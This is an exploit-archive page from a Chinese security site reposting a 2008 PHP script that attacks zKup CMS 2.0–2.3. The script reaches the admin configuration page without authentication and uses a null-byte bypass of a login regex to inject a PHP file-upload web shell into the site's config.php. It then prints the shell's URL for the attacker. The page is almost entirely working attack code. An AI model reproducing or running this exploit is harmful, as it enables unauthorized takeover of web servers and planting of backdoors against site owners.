首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 zKup CMS 2.0 <= 2.3 Remote Upload Exploit 来源：charlesfol[at]hotmail.fr 作者：Charles 发布时间：2008-03-10   #!/usr/bin/php <?php /* * Name:    zKup CMS v2.0 <= v2.3 0-day exploit (upload) * Credits: Charles "real" F. <charlesfol[at]hotmail.fr> * Date:    03-08-2008 * Conditions: PHP Version, magic_quotes_gpc=Off * * This exploit spawn a php uploader in your victim's * server. * * Okay, you may need explanations: * * First, we can use administration without being admin * (see ./admin/configuration/modifier.php) * * Then, when we add an admin, it is saved in a php file, * named "./fichiers/config.php". * A vuln is present when the script controls $login value, * because it use this regex: #^[a-zA-Z0-9]+$# * in order to see if it's alphanumerical. * I bypassed this regex using a NULL POISON BYTE (%00), * and writing my upload script just after. * I finally put some lines in order not to * corrupt config.php. * */ print "\n"; print "   zKup CMS v2.0 <= v2.3 0-day exploit (upload)\n"; print "       by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n"; if($argc<2) { print "usage: php zkup2_upload_exploit.php <url>\n   eg: php zkup2_upload_exploit.php http://127.0.0.1/votresite/";exit(-1); } $url = $argv[1]; $code = ' if(isset($_POST[\'upload\'])) {     if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) exit("<center>Error (move_uploaded_file)</center>");     else echo "<center>File uploaded</center>"; } if($_GET[\'up\']==1) { ?> <form method="post" enctype="multipart/form-data"> <center> <input type="file" name="file"> <input type="submit" name="upload" value="Upload"> </center> </form> <?php } '; $code = urlencode($code); /* Not to compromise config.php work */ $restore = array(); $restore[0] = 'admin'.rand(100,200).'%00","mdp"=>"436ae61e82a236bd4771e184a556bf65","lvl"=>9);'; $restore[1] = '$tAdmin[] = array("login"=> "admin'.rand(200,300); $postit = "action=ajout&login=$restore[0]$code$restore[1]&mdp=real&mdp2=real&lvl=9"; print "[*] sending evil c0de ... "; if(preg_match("#alert#i",post($url."admin/configuration/modifier.php","$postit"))) print "done.\n[*] upload script: ".$url."fichiers/config.php?up=1\n"; else print "failed.\n"; function post($url,$data,$get=1) { $result = ''; preg_match("#^http://([^/]+)(/.*)$#i",$url,$info); $host = $info[1]; $page = $info[2]; $fp = fsockopen($host, 80, &$errno, &$errstr, 30); $req  = "POST $page HTTP/1.1\r\n"; $req .= "Host: $host\r\n"; $req .= "User-Agent: Mozilla Firefox\r\n"; $req .= "Connection: close\r\n"; $req .= "Content-type: application/x-www-form-urlencoded\r\n"; $req .= "Content-length: ".strlen( $data )."\r\n"; $req .= "\r\n"; $req .= $data."\r\n"; fputs($fp,$req); if($get) while(!feof($fp)) $result .= fgets($fp,128); fclose($fp); return $result; } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·zKup CMS 2.0 <= 2.3 Remote Add ·VHCS <= 2.4.7.1 (vhcs2_daemon) ·ICQ Toolbar 2.3 ActiveX Remote ·KingSoft UpdateOcx2.dll SetUni ·MiniWebSvr 0.0.9a Remote Direc ·Solaris 8/9/10 fifofs I_PEEK L ·phpMyNewsletter <= 0.8b5 (arch ·千千静听 med 文件格式堆溢出 ·Motorola Timbuktu Pro <= 8.6.5 ·Galaxy FTP Server 1.0 (Neostra ·MailEnable SMTP Service VRFY/E ·Symantec BackupExec Calendar C   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved